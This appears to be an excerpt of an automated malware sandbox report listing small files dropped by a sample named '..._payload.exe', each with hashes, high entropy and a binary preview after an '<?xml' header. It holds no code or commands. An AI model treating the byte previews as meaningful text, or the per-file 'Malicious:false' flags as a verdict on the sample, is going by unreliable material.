                                                                                                Preview:<?xml...y.....Z...R..l...B.7ZG."..`...2....@$S[...^ZtC...........|V..g.4..M 1w.)....e.....~.....N...e4..>o]..1...z.E.~.......d.U. ...[..J...[...B..l..<....S.kt.../jI\#W..}.e...rg...Vj|...w0.^.MHM..'.#..2..K.. 6oH....A..!..".3);^;_.A....9..).}6v3A.BD..L............A.....Et.......9..`E.*I._O..SO..VA.*.pE..s....Z7...uI......0J..Q...!,# ..'{..QU..O..,T.....v..[.h.Tfu{k....,.(.Ne...o....I_u.....Xj.D.56]YS#.>...+.ZU..,4c...t.g.%.....v.e.o.....%...!Uq......... Q.(.+.'@.vV.S>.TL?...J...,..Et..EwX.M&F.u..\$ .s.._w...\....0..._.lN. ..W........^u..za.e.g.D....#.../.nPI.:U[.Q..d,/IK.&B4....b...A._2W.E.jrN6./.|.j....)D.#..U......e.....JC.....B..!.K.n3g.2y....p.]}]..f..^fL9G..S .. K...^u.<..s2........8..... ..x..7UTm(...,.Y.....dO,..~.k....HM...c.G.H.....m.O..5Um..:.>l......p. ...$..|uUx.....2<..:..P!..8..-.^hGz....T..<.(W.w.V...4z..Y}.....hu2O.....o..W.....0.eH-.Q[.hr...<.<]......;|n,.2.B%.0|..%.g..."..VH...?..T.g.vaa...?..6....N.G.w..m.u...
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1702
                                                                                                Entropy (8bit):7.87752193513552
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:RXnquP4MVJgLsLXClWd/45b6w0DLVur2J/1Y+EfoG/pZg6mNcJWyDhex3bD:RmkOLsr/g5bb0DLVNLYciscJCLD
                                                                                                MD5:3F73BE1E789904C18D3A15263AB57D53
                                                                                                SHA1:883E3918F8F753573BBF5B19C28A2626DCE6C6FB
                                                                                                SHA-256:616BE32E1B09230A875229C1C3C2DDB335FAF07A98E4645407F493FB85C596A1
                                                                                                SHA-512:BAB8DAB0DDAEF43287BF290F2901B14F1EC113D1323E3DD78B453C28010412FF087308556BC83A66701405092D1C79A2317D4568F1103AE6B53047D57EDC34E4
                                                                                                Malicious:false
                                                                                                Preview:<?xmlIK.'....[..#.x.LD>....=...E.a)...R&.~.$F....EPq..r=......i._..l/*..~.,...$.*.....p....Nr5 3'.x...#.......;T......H....x..,..7..`..y-.#.Y.......VU....x...h..0.#.$.*..\t...cO[.[.....x.R 1.........>$..Q....z....^n.|.+D8O..u...h........R...^@.&jxe.....w.+....%X.0+d.qs.1....Q..-T...2. ...D..)j.q.-.v.du......8.. ou,.>b....y..W....-[..3..>....t..O..n.].[..1...{..qj;.A...4......z.}4-O9.]Kd.N.I...|R........s.......#........8....s).H....O.W..g2..8(..[S...W.$... .Q..%#2..N......Az..(0..TnN7....../C..$.@..@}c.).....M..c|.b..w.]N>.....N.,.....%.x...ZE.;C..O]C..&.6....uT.(....N.....X...Yu..>S..\...[...L..g.......b.DsC..L.-...V.haY.U......g. .Tr...{L,.\TZ.....q..=...m.H.^l'..X....(o....%....:..[.q;....s.M.Sd....9<.....6..YU..Jr......bB=....J0......?Q3.........J........p.;X...k..'.w.W.l.owh,...(#..z..~..[.6.]c..X.R...`..7.....p;..xB..F'.;.V.E!...Wa...N.J.....:..T...;.JMu......B..i.\..w.........N..M.0(.......=f..{..m......F=.^j.a......O.}...0.?HR5
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1739
                                                                                                Entropy (8bit):7.872556180220425
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:C99uRzw2lHFKUr7UXYssA2UjhnlKzVzlYtSoH6d9LD:C9kzw+FKU/UXsA1jTKzVlZdp
                                                                                                MD5:0CEFFA3C47530D30A6BCC92527622D89
                                                                                                SHA1:8C3A680DBFE47CB41857D3B9E0FFC5C08802DA0C
                                                                                                SHA-256:D2ABE8B8687B8F70A11892AB6D96BBE40EAB15B03E32B7D7F8048BB6BA911FB2
                                                                                                SHA-512:4CCCCAA21DE172EA8E9F9E2742550C86B5B85F649A80596A2283E91CB7BFD81F148F6D452410A8EE92D4B7072381C49768357E32DE510C472E4BE919EFA5F0A0
                                                                                                Malicious:false
                                                                                                Preview:<?xml. .c..%.Hx..............<3..Z.Q..M.....-J...2@.._..eZ2,.X.........M...J.g.).%|s..p.x}....J:.I.L....\r...=E..)..Y.wI.|....J...w...O6.z..i*.V.w....J.g.0......"...@.e/...t........i2.......+s..@V|..TH[...d.t.....y...+..]S....@.E.?....z....)..w..._......fQ..&1...TNb......a..8.R. ...:...-C..{.2.. ..?..s....4..4..DO..;..|.A.z..@{.....b...gV...W ...e...A.d...$-q......7.t.-.A."L-(....G....z.....R.`Ws.He|.{.Z@H.T7..e..K.....&...l..J.{(/wm.P.....x...VI...]....Xe.B*..}+..IB..........&G.5..E|A~..}....N.V9..9z..4.z.........q.*..$....5.....E.?4!.x`1o.7N.{..4lw.Fre....*V...]LRys#.>.}>.F.%...tV1..Wd,.Z_H...<).#.3..v<.7.8. ..............+..."Gl......5.i...oE.....Z8_.R.....0..7..2...5..fw|.;.....\!55UJ.i.!....#.ZG.....'.T..."Q...0H...\E...>.!.e.he..).Xf.wr.c.X..c0.1.......K.....vc.'X..~.....5....(.F....#5a(T..<^..d..h.b..6...YX..z..Ux.P.3...]9.Y.....P.M.......g..M..#.....)..PZp.L....S.mIC..:...v.E...../.\...ra+em..(,.8&.....=I.@Dw. ..WWw.U.@.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1724
                                                                                                Entropy (8bit):7.889522391852501
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:+pn4ZG107jibkBPIJMCycYxXieI7qIAID+4jm5dZHLD:+pnLKWIPI/77SIK0edZH
                                                                                                MD5:B1260DD7E24F9B4E665B06CCA61BE6A2
                                                                                                SHA1:9784B6C353A55071E44E74D15310B099D2800B24
                                                                                                SHA-256:22FC66947FFCE47AAC0EE1A92B152356B536A5F7A4A4D159007A0829258262C7
                                                                                                SHA-512:2FFA5B38F1918AAAA414B487BD582D98DA1E24A709DE38CBBF2BE2D952C71D7F2B6693F13B46F9E23E2E987693461A0CB5C4D20BB1D85A7D2E79DA02C312EE34
                                                                                                Malicious:false
                                                                                                Preview:<?xml.Y..-.[..et..|.U.(.w..#.*....+.F..;.13..#!..hj+...`-..+.2S\...!I._....h1......Z.../.D..L'....;wp..zh.."..7...F~TU.b^....`...L3SFc.w+k.K(?T .v..]..M2R2$Md.i.g+..X......g..3.S.ZoJ$[.p.........!..S..|r.Sl|....^.3..+..:w.x.kk.v.z}...-!.....R......"...6.{d.5......z.6uF....^...Y...4....#..v./.*C.,..geL....!.U.Xe....p^....c.:pt.\\.o..r8....w_.0.I.0....D......Ca...K.=Y<R#...P....F.J.a..{.(..OWlA.O..`$..6.T..77.7..y.z4...v........1.Z8Q.d.^i.........dv9.h-Z..SA3\...M.x....z_4...m.-........6.....27.../6.Q..4%0.....[j.5.)(*.....@.`.]..,#.Y.9>H.9..M............H....+.t.K0E......~T..Q..JcY*'..."..x?..;....C./e7;s.YJ.......jn..R.kI..[...._..I?.e.....C..~..%!ve.X....3...bs.)./.Y.z...E..-.Xec...t.1s.W.w.h...f. .fH'r~=,.-...o..?....@.."..mJ...)..$..*.T:..!.O....dz..^.=...Q..U...|...D........y[.*............0..x*....XD.M..Y....5$.2.T...?fC.2)w.!./.$.sg...p.5.E..k./...l.........O[jz..ka\.6.1.W;.\{.;w.jnP..Y.&....U....V+.."O#S..#..X....,~...y.]...
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1761
                                                                                                Entropy (8bit):7.8988857560472585
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:1x+gbYFTjwvwGW9wIspoW0KxlPhHme8cW1hVfwQZYLLUWSLD:/bYhMvwt94oWLt78cOhVfwQaLLo
                                                                                                MD5:602422566A5E1EA69E332E3BF703FFA8
                                                                                                SHA1:17478A642CB54D6FC0B64C96CA20793AB9C08790
                                                                                                SHA-256:72EC10BD8E22707CD6FBD511EC5CA2A5CF9BD72EC0128AF18FA5A052ADB77698
                                                                                                SHA-512:79A4C612FDC39D7253A8423D1F042AA04459923D8129ED7D6726DFFA6C6EE747C6C6FD2D1AD4A8761EAD11A472120E016FCA627650A38C858E50BBC3214C7A00
                                                                                                Malicious:false
                                                                                                Preview:<?xml....u.=.....Mh...^.Z^Yw..:.Z....0...O.....p2..K9#F......(.q....2Kk.Tdw..<.os\=.......<.....jMG.t...O_...*..(......V...=."..sN.HK.~..93n..[....QV..W..5%*v.NZ.. .t.......s;..e..W..M$1Cl..........*.D.U.U...O..0]j...<R.\......o..../}%-q.......u+.;..:..-#.....o..sj....;Ntuzr".q.....@K<..2......|..\!A1.nJa....q...]...8!.J.l ..x.,.I.}.....4ZL..'"]..X..@#...=.D(..1.UGf..A.d ?....r%4...&....'.aU=/F.'3..E....au..)4".......c.....h.d..Y...V..[.y....@oI[B%....o.....L/.;..a...!o...E....17.L.1U{h.........J...E.r....V..kK...<9.X=..s~..s.h.....G..bj.3.;........z+.P....7...h..G.......Z_.2.1...s.....X........=..g>L.......\n......O0..E{1.Vb.&....q...b...O.'....i.2O.g.s..p..)&#K....8.....\.8\..G...t`f.%.<.~.......2..\..V.|.%/..$.P.......D..K.)_..../.{...t.p,...[...#.....A.XU{o......0..j..n3.|...lQ.R..h.Z,...H.)...N...'...=..#.......#.9@t-...`...*.....5x..:.R....|...0J.R..a....6.e..}..wc.....@.yk?.........c....e.?...L\)}.A^ex..gg{.;.....oi.).
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1689
                                                                                                Entropy (8bit):7.877535206430339
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:yi3k70WMKv5BmcsNoeJbgL82/iEDJXlQ5aVA9LD:yi3k7PvfLOoeJbgrDJXlD6p
                                                                                                MD5:5358515EF797E51455662AD66BA31170
                                                                                                SHA1:F00B33C9E3C519A739285E4BE824A4B33F381326
                                                                                                SHA-256:F8FA81AB59CDF63D17A4ABFD473DFD4917449A30EB09CFC3450E36A29C644CB9
                                                                                                SHA-512:27002B6FE5827E1D3EB55295C49474BFA59EDF99E773DA4514199A6BCD78B9E077AF47FB29717AC6F93EBB5A47B6B18BABF2ED524C85D5AE270B94B54B519066
                                                                                                Malicious:false
                                                                                                Preview:<?xml....h..A.8r....{.C...]M.....5.T$S.6......X....!..s.6.-.A....l.a.$S...........Bd!.#$..l.....%LC..].NG......W.;\..2Vn .(.........QN..d..c2i.I}Jc..6..X.mgm...Y=..)y.....3..c:.U....}8..,.0..3^.O.N'.Gd.!.7..+.\/....+)~....~.1.D:.."........rlK....&'.".M....mc..-.6............6.#.Y/..Z!...A.a.....z?..2.#.<.K....;.r._.......g.[L.?Nh....;..7.!..vA......Z.......#.@In.m.....#BL..#e3.)\*7..)C........[O...=&..0........U.?iv.-m\.b.".,..*)N!........H.......L.$....C...^..cU"....5...8.........i>....+b...T.$Y.~...t......}.....qp.n.)...Y..>O..<a...D..B........`.....{.....v..j..B..#wyB.'-..y...N.Mlhy.A ..=-s.y...r...P....J.._.b..W...h...(...AV.$n.Q.ha...cH.#.a....1[B....6.k.H.k..r@...l..+.<<WM..\.-.czb..q.LW-.."..-y....65....?..1+VkV.....]...j.....9..Q+.w\.../.q}....W..5 _cl8hf..]n...4.(.B..F....{.....(~...t1.@.....+..=5.R...Z.jT..J..U-,5rH..V.d.._AE.....O.f2....G..a..z~@.w........F.%8&...&...Q....<q.na...m......1..7+V...K.....w~.<........-K.m..L..Y%){a.C
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1726
                                                                                                Entropy (8bit):7.879433878218575
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:duw2nGCbVis1SNFeryi8cDNOCMpeUhayqcFJLD:0w2n2s1SNFeryi8GOCMkUhayH9
                                                                                                MD5:D5AD911F0AAEE446BC4C158F2A672DF1
                                                                                                SHA1:A31A3B938A18E75956CE9FB9E46F8ABA29AA47C4
                                                                                                SHA-256:8BE3F1D625C5F5D6C5FE6ACCED76E0CEDE59954FC9979B6285956D171A507B9F
                                                                                                SHA-512:411EB568E3192836E3123A2750099DC389BEA39DFAE2C221F19252A9A2ED7EA9F8B6A123BDB8D4764E5BC04CA436CB9D844D8333FDC043A5A5F7B636FEE3F6F0
                                                                                                Malicious:false
                                                                                                Preview:<?xml.....^.]..T...C;...:...R.ET...`..a..L..}v.m.J..voG..P.U..4.`.8w8...r..F.v.6....Y.....^\......o.-..k..$F'|..8....C.s.M.^S....Y...i.}.s......~.5n.h..;[{.....#.M;...W.eh+...X..XO..1.X..HO.....D.-......=...v...?.J..1.w%..91..'..[S.}.~T...NGFyP....Ko.........6..c.....O+...x)&M..O8<.1..b...2.....LPX.U..ld.8.K&.JG|...." 5_V.._S_.....s.I......27P..C#.Z....Z).%{7.....60...M....<..u.qz.PN.F.G]rY..../..*....1.....+...F...ib:T.....7....Nt..Hx..........F."FE....n'.N.%<F.XDg7U.2.REfs......^..?%..A..,..........U.H~K.;.u{j<.U.c9....9Bd.....g?Vd:]..:`f.....F...P..G.d6.'..Ou..{.U.....-e.u89._A.....e}..X.Y.B...7.{.Th.W....3.. Mb.~...2..g.a.....R.hq...}.6M....~wV...*.Q;..*...YTwva..%Fz.a#.....}x..0/..........5.fig....(J`..H...r...0-.#..$.&0......${H.5......./....5I.A....SI.x.N.....xBC]!6^.....d.....{......D......:...I.Kt.%...{..c..<......]....@...b..a.7...w.S.P.......+.|..b....:^...f.E...z.M...B....8y.g........X!.E...f(._.ue,.........P.^.@.p
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1707
                                                                                                Entropy (8bit):7.869655195137295
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:qf5RIzbYi1B5/vQGe4lFWQp1U0uCwsHLOLD:Y5KbYi1BdQClxp1hr2
                                                                                                MD5:77EDF91CFC3419CEBB8D0644FDC61DA7
                                                                                                SHA1:D0FA0FEA5F509DE7ADAC8145F0EEC09C28785BF6
                                                                                                SHA-256:3763DBA8FA33C96F980896AB879F8D634D6CF25B9DD00C1D9925E0ECF8B88172
                                                                                                SHA-512:8CD7E3B0422389711C90DD0CD6FF42DF64B085B1F7E72F6EBC04D2D42B6F5B4705FB1BEB7666A446027514B8BADDCFB637B92377FD59D1778C4964E013695DF0
                                                                                                Malicious:false
                                                                                                Preview:<?xml..{s..@.hI.<.......1..wXvp~dz.r......3....[..`.B..Ky.U.......n..Z.xW..'....!_.....B.\B0..oa......?Y..Yu..*.&..l.;..|>4#.t.uX.?.\'Pbw.?...0...8!....k#5....1...F..I...'o..Us.F..E..=.)Ly!K.......Pz;.Y/I..L.....{c+.`@7.n".^.Cc..Z....&9..o.#.@.... .U...Sh...N.X........su.e.",._....h.s....k.P..v'...~...k..)6\h..;\.-..l..M..S.7....q@S.g..G .obT..BtA*.B\.[.{br...}L..Fn...g....F.k{..U.p."..i.....5...Ah.)...:d.;LH.6.|b..t..y.u.V_{....^[}.Dl...g..PT.~......|. ..C.Q..J.....0J.#=..,k.u.e.g..@..W.)E...*.6..}..C=[C.0N9..p..~....>..QQ..b5L...-...%.z.....UA.;.....,l.......3F.v.l;........b..........)....A.Q.s...t...K...!.`0.0.v#.......TB`..g'.C7._-....d...v.m.-.Q..t%p.E>.l.y.NPM.....o.MZ..Y.vg.#G.rv.9..Y..._..PD.....K.b"...../.."...L.......DKjG.H.W...<LL{..w\T.....=...G.(Q...VtC-..m.0...^..f.....%..X.R9.f.@m?......CV...Z5..m.?.8...YF_..LTv,U.0xS0...M..j5.7M@..B+..j..wR.-.."......e.A..#..;.^{...!.0...Ln\@....}.9........?..-.q.=?.\gJr....a..c80..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1744
                                                                                                Entropy (8bit):7.877195823656647
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:PV9g1vLb4rpEfFQnxz5bjSweRX2/yMJoAIFPF4xLD:PSLMrpEfCxzRjSweRX2/ycIFw
                                                                                                MD5:8B6BEC1A3578B5E53D858EA479A238E7
                                                                                                SHA1:563AEB24D03C8623D8DFE8BA8176812A993FA75C
                                                                                                SHA-256:FC233965F58C1BD1EA5D7197C0DD3C5A0B3032E2842FAD6A6534DC17B49705F0
                                                                                                SHA-512:7955D33A787947F416DC7213666ACCFC9D26BF6CC2B73E32B5EFE9086ECE6BE2DBA91804F798B851461C83B10B2BD5E7B67F9D026C2A8AAFC3574C62BD614E9A
                                                                                                Malicious:false
                                                                                                Preview:<?xml./V;.r.../2.......b...../q..BZ.......vS.,........iL.5....X..H.?.. ................h.l...w..+.<.x...<..T...b......<T.y.....e..T66wI`.....gh._.-...z.4.B.X<...0:lsm...1..>..o.#..,t..b...naL.{.....x.7-.z.9..'\.n..:8..7J..GO...S.wLQ9..%.j.......&&.j.y...I..p.\B.o ..y.X...7..y.iG.B......('oA...........}B.Q.F5.....pY.h\...e....k.#/.....>.%...q..+*..2.L....%.'.....?.x.7M. .7y1..T...6x1..x. K".Nn...]&.....cO.\.{r?W6...BT%..h.{..V.tQ.....U6.=.h.......7H...X.../.:..........b...9....~.....)x\....\$..U. ..B.F.W.Nq. O..z..M.G......;..8....EK......K..?...h#.....+[.f...]@.z._...D....s(..t-~....;....N.(..Y$....Ck$f,.....0.F.i..E_{.H...g.....;.k".....`.f...w.Pk.#.g..G.9..y...Q....].@f. ;S.y...].85.]gZk.I..s..f.`V...>S.;.:.>........g..?...;......VuN..!......'}.=-o.7.H\.~....~.<LH..?.$#...R........c.........|a..n.x....a.;#.W..3....p3."xIX....^...e...,....E...i.V.y0D..L..CM.....<..aeE..L F........DT>..........n*.D....8Eb..N.F..gwL....P.X........t.....
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1695
                                                                                                Entropy (8bit):7.8969612373214275
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:p+OpFVJRQvspoDYmVxv6MoH83doVHkzuy6LD:p+ODHRQv6oDYVMLdoVHzya
                                                                                                MD5:B2E3AFB52388A8987778DBC92B3200CB
                                                                                                SHA1:C1E4116E87C56F81765BE2EC72352D453961E37B
                                                                                                SHA-256:4088C387899489E27FD8D3E434F02873DADA2AF111EB32A456B67E5B20537D47
                                                                                                SHA-512:6458ECDD4C3CEF3FAC4F8C0DA86CA29D6BBD767F49E4BD4E9B8660367D413DB48FAD0F1E6D1E866551476470A835BFEE0FD1AD4294244100ED2E39214EBD5FC9
                                                                                                Malicious:false
                                                                                                Preview:<?xml,....k L../...DQg...zY.t.u....h'...%....2....T.$..X.&~..>L.....(a..DMi6.F....<.6_.\C.RK`}q.EK....2.$....1.'.!..C.3?....dX.Q...t!.X}i..}.T.......@..Y,...<..4.....t..Y/.d.... 2......\P2.#>?(.sIt...........p..'..ESP;......i..7/..p.,8o8..a..~.,5.#....Ce..A.*) ..4.z..zcR!.F.3.r0..._|+......5..{....$..u..>....5Z:.}.]@EaaI.V.`.>I.l....]+..c.....L...)au.....q.W\.)...._..x...wwK.9....".~...Rkm..7... A...&.8|.P{..M....as.....Z.g-.Q4..U.<..V.A,_.H..P1....D|.88/..!.P-....7..u.M:...vH...@..............>..*....8...GF.$N.+....niuN/#.e..5,.....@..(............X.....lz.......W.M...Z..J.>..41e..p.Q..../....~f.N.C.-.;.......}.....%X.EB....._..Jn.\.`j...&..&.|.C.Z...a.sw..o.. .^m....SZ...}.....#......X+/...G.........n.W...H.W.}......=.}G.+.O..NO.dF...6.T.~L..xF-..A.......Y2IB'...Z...Ff..U.)uD]..i...z.O4..G.(.6...8.jY........m..2ZE.9C.....s..V..t!.....wt.2....:...i..0.......v....Kq.&:&..".\...[.v.|..^v...mp...v...F...$...).\k=...q.sq.TZ,..t......u
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1732
                                                                                                Entropy (8bit):7.889413091636869
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:BWeCFDppZSqhjkGXjnMVZX16ju+JfOAISUuCxzh/3Tzb8p9oLD:BWnQqBkGXjnMVZX16jDtI5xzhLzb8p9c
                                                                                                MD5:9DAE433F1EB60E374A58FAAC03FD0516
                                                                                                SHA1:AA66EC33FCBE731AF87C36E16137568A0261BD91
                                                                                                SHA-256:ECEA5D3C5178FDFD55EF81BC39A5E7EC18B42B992993DFE9B0B627A840860B5C
                                                                                                SHA-512:DC97F750634AF5CC6EF8EDE5137BF92227760E931698C8220160158AEB122828A03DEDCF7E78C1460DDEFFD2DE57FE95DE8AE6507674CAFECEB277C318DF3218
                                                                                                Malicious:false
                                                                                                Preview:<?xmlJ.N.y...a....X..8.-s3,.r/2dN.J.....~E.....<0Lf.C.."z.Yr.@i.@.M... ....>l(]y../Q..B..?.......6...r.0.K..; Z..W....E.G..}.....@.{3.<..O..1-c&.nv.t.K..S..l.Z.\r...@.6.......X,..M..q.8.`S...I.I...........0....<...+..\.&`)x..:...]W-6.^.V9.%V.>.....@...i..(........5$.R.K...T..n...!...4.....F...r...J.HI...O.0...6W.....>..}..U.m..9u1z...U....C....c..a.~+.....V.>.e.......F:)cW..O...L"g..a.!.^H........>jW.9......b;ba...=.......o.5.U.....q..6W)...l.g...^9.....$).5F...(.8.[;p9.HRKd?.^[........._.u#W......u.$c..(./..>....$.b.y-.F....&..A:...r-...&.rn..5....%.,F. .J...ge.=f.<J......CP...D.<.{~..4U...2.=...^.!.|C:2HXB..>W...........&.....0o%....{.....yW..j.4.4.f..,=.#,A.:...*.....d...*.>R..]...m.../.Q\.#.d....x2..m...t{....mB.....ORq#..c.v.-..Vb.?.....W2......e\..._../.?.;.u..>pn..&2.V(....r!..R/.;.'.<4.,.#..!$...\.2..y..3N.}..*wo.T..^Rs..._..5..c.Z...*..P...m...}.':.S.9..to.B.@`.A.. .7..bY....5>....;.O....-...P.....z....w.N...{E.....(+
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1693
                                                                                                Entropy (8bit):7.8847199235113195
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:eWQGdV6YLR1UrSARV450VPjDyUsd/381GBoIfYMLD:N5dV6YDgSA06BOU6/Nuid
                                                                                                MD5:4FAB6680C4110B5B4E5B5A8DF39165E7
                                                                                                SHA1:C3024D86630F2726B4D823FDD69B85F7A7BD3106
                                                                                                SHA-256:20E477EDAD666D369387AAC929263031B3547D2A05DF3BD72910D7D934EFD0A5
                                                                                                SHA-512:8B014776ED760DD13A234368D6F1B83C17E596CDCC5CFDE4E65191B999038C636A81D9BD75948D26694B36A3DCA2AD3C5603A9665B9DAEC928328BA14E2D9F72
                                                                                                Malicious:false
                                                                                                Preview:<?xml.y.kU#..ryj..e..6_.o.dz..d;..7N-.>F..F...Y`l..S!s.^...&.dY...Q..mS.M.v....;.I..D.0....c!{..V.ZC..f..._b..R#.......7..;...........9.p.......]......E./D0<S`..].}.:,@S|...7.t;q...{.E....@.E.....W..QC.L-..R.2....R..B}%.lR.-!..........R..E......%..........#.,...>y..G...j....W.'P.T..D.R.U.w..]2[.....m..8...l...9..c.G.#.N..0...7j...JF4.y............h......fn...._V.`...%......f.f`...a|.~~...J...B. ......NX....~mmo..c......,...'...y....R...K<..2.....S..O..i...E..=.8+.....3.L...;q..Q.E5PL....t....5....]_...O.?...@.L.}....a`.....A.N.l.?>T...B..5M.8-".N...j.:L..Uv..,8..,.....H...ji!p.g.8.Pn...M.=.-4<<.h..H.....].?N.0.I.M$}.MFO...$..g..L- ..u.-8.km#.c.X.?.....uS5...!r...........B.w.`X..@..RK.6......BahD.o#.(..]..W...he.I.K."..........m.!:HX.3....&.m..0...r.....Kw.).. N...\.EK....5...H.....,.x..]TJ(.. UD.D...../..~..6~[v..e... ....cC.....[s.Y_T..|........a.R.[|.mS(.j.@T..j._.w'Ih...K.M..oEQ..[W"&....8..%....1O...7..D....$..=.9ez...F.H..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1730
                                                                                                Entropy (8bit):7.867275317015578
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:O0NldhB+0AXy1IlR7R7UvOE6LVI6P+4pXYSEITJs9u6zIASgjqe6nwZBx3bD:Oiz+NSIlvUv86/45YaTW9u6ZS/zgLD
                                                                                                MD5:CDC059DCCF418E2172693C9FDBB737C9
                                                                                                SHA1:C64931719C2ACB64AFF0266E26579A0A5732DD34
                                                                                                SHA-256:4618216858C27F52C0F8997129E4ADD8DED51D3BC6A0FDA7129FB3F8001B8C56
                                                                                                SHA-512:901EEF6E247FDA0952B2314DC7686E30EC899056137D9B837596407C0FF369FDD20E3D21FE4D4815ED9CFA0D0A45F153F15658233332069D9FA7B37925B30222
                                                                                                Malicious:false
                                                                                                Preview:<?xml..........DF..nKA,}'3sM..|......Xe.D..*r.TJU.zDc.hJ...T..aM....i*^,l.5m....M..K(..7.O.7..cN...."e4l..q;.?....^..=.`..^^............E.Dr4..p./$..nk....Or.#F.....;....b..I2.>t6..c5.G...D..51bEu??Q..|..l.+n'....O.].......;.Q..=l9Q;i......a.V...pVj..=....}TcG5..(..K..&<'.U..h..8..1.O.....2.&.Y9{.?.cE...GQ.+x5.9...7.T....I_n*..M(.~HJ...(.=.Zm....HE?........<...Am.k ...d`..]....B1...mMi..3{l...=..>o..;..X.@p..$KD..{.3S..z...5....w...O$U`ZY.6t..O_..P.zB..r....h.S..N.....A. ..X.....~6.$..3.....K..x......3.5.{=SR..>...D..:./...#..p...c;wI..::6gQ.[..X*...,~.D..[...c. ......EZl.....lQ8....~.~W8C-...4^..hTx.P{.4.'v'qD...W(...h6.j.oE..A.J...X..$.'l..Es..in..R...$[.f...........xJ&.&.C....|.^2.E.b]rs[..5....PF...).sdw.3......5..`E.p.g..U..YP.<B.*a...0....;.A?.B.b..*..!........]~.5....,L.......k.L...O.1...Q.K.......-H7.r.+.9.....;-B-a3v...|.yq.O*..u.[p....y.......^...3J.W...*{.Z4.=..o. ?....]~.......<....%. .aT...-.......$.r...p....Z{..aFa>..&.v....D...* 9.{.x.$..W.Fr
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1715
                                                                                                Entropy (8bit):7.865915280284968
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:6IIVbLRxCcjT00vUeoQk/wwnYBAqk8bO4fLD:5IRRh//M2Ow8YA3+O4/
                                                                                                MD5:50ABA89A7D8D434E0FCCFFE113F7D584
                                                                                                SHA1:D8A6F7928FF4F547B64BFB86352E748C68DDBB6D
                                                                                                SHA-256:2B265DF27F091F1A1B3F33666E2E33B5A45B6742FD6C1CA18006989EAAE7C7AC
                                                                                                SHA-512:6F54ED88777FF9B15EE9949823CC8A0CFEE082E2D350C030582D715B38EEC71D5E80115F2C47CC4FCE6B40CB81F96E6F619848045E711CE1A3F8896AF0C4D2D5
                                                                                                Malicious:false
